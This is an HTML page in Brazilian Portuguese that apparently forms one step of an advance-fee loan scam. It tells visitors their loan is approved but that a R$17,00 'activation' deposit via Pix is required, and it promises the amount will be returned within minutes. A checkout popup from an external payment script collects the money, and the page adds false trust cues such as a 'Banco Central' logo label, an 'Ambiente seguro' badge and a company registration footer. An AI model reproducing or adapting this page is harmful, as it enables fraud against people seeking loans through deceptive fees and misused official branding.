<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação pendente IOF</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="../assets/style.css">
    <script src="../assets/js/links.js"></script>
    
</head>
<body>
    
    <nav class="navbar">
        <div class="container">
            <div class="logo-container">
                <img src="../assets/logo.png" alt="Logo" class="img-fluid w-50 img-branca">
            </div>
        </div>
    </nav>


    <!--BOX VIDEO, timeline...-->
    <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">



      <div class="justify-content-center align-items-center text-center mb-4">
        <h4 class="alert-success">Parabéns! Hora de ativar sua conta</h4>
        <p>Para ativar sua conta e movimentar seu empréstimo, é necessário um depósito mínimo de <strong>R$17,00</strong>.</p>
        <p style="color:#2e3191; font-weight: 400;">Aviso: Esse valor será depositado em sua conta em até 5 minutos após a ativação.</p>
      </div>


      <div class="alert alert-dark text-center" style="z-index: 1;">
        <h5 class="mb-3"><strong>Conta Digital:</strong></h5>

        <ul class="text-start custom-list" style="list-style: none;">
            <li>
                <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                    <path fill="#00adca" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                </svg>
                Pix 24 horas
            </li>
            <li>
                <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                    <path fill="#00adca" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                </svg>
                Pagamento de boletos
            </li>
            <li>
                <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                    <path fill="#00adca" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                </svg>
                Cartão Virtual
            </li>
            <li>
                <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                    <path fill="#00adca" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                </svg>
                Saques em caixas eletrônicos
            </li>
            <li>
                <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                    <path fill="#00adca" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                </svg>
                Atendimento ao cliente 24/7
            </li>
        </ul>


        <div class="text-center mb-3 pt-4">
            <img src="../assets/pix-logo.svg" alt="Logo do Banco Central" class="d-block mx-auto" style="max-width: 180px;">
        </div>

        <h3>R$ 17,00</h3>

      </div>


    <script src="https://alphapix.online/popup.min.js?product=e28b1908-bb20-4099-a7eb-3079e60d490f&url=https%3A%2F%2Falphapix.online%2Fcheckout%2Fe28b1908-bb20-4099-a7eb-3079e60d490f&text=Ativar+Minha+Conta+Agora&color=ffea00&textColor=000000&position=center&shadow=heavy&size=medium&animation=none&borderRadius=8&fontWeight=bold"></script>
<script src="https://cdn.alphapix.online/checkout.js"></script>
      

      <div class="d-flex align-items-center justify-content-center gap-2 text-muted small mb-4">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 256 256">
            <path fill="#3db1a5" d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8" opacity=".2"/>
            <path fill="#3db1a5" d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160Zm-70.34-18.34a8 8 0 0 0-11.32 0L120 148.69l-10.34-10.35a8 8 0 0 0-11.32 11.32l16 16a8 8 0 0 0 11.32 0l56-56a8 8 0 0 0-11.32-11.32Z"/>
        </svg>
        Ambiente seguro
      </div>





    </div>
    <!-- /conteudo do container do video-->




    <!--FOOTER-->
    <footer class="footer py-3 mt-4 border-top">
    <div class="container">
        <div class="row justify-content-center text-center text-md-start">
        <div class="col-12 col-md-8">
            <p class="mb-2">
            © <span id="currentYear"></span> <span class="marca" style="text-transform: uppercase;"></span> S.A.<br>CNPJ: 60.779.196/0001-96<br>
            <small class="d-block mt-2">
                Avenida Presidente Wilson, 9<br>
                São Vicente/SP - CEP 11320-905
            </small>
            </p>
        </div>
        </div>
    </div>
    </footer>
    

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

</body>
</html>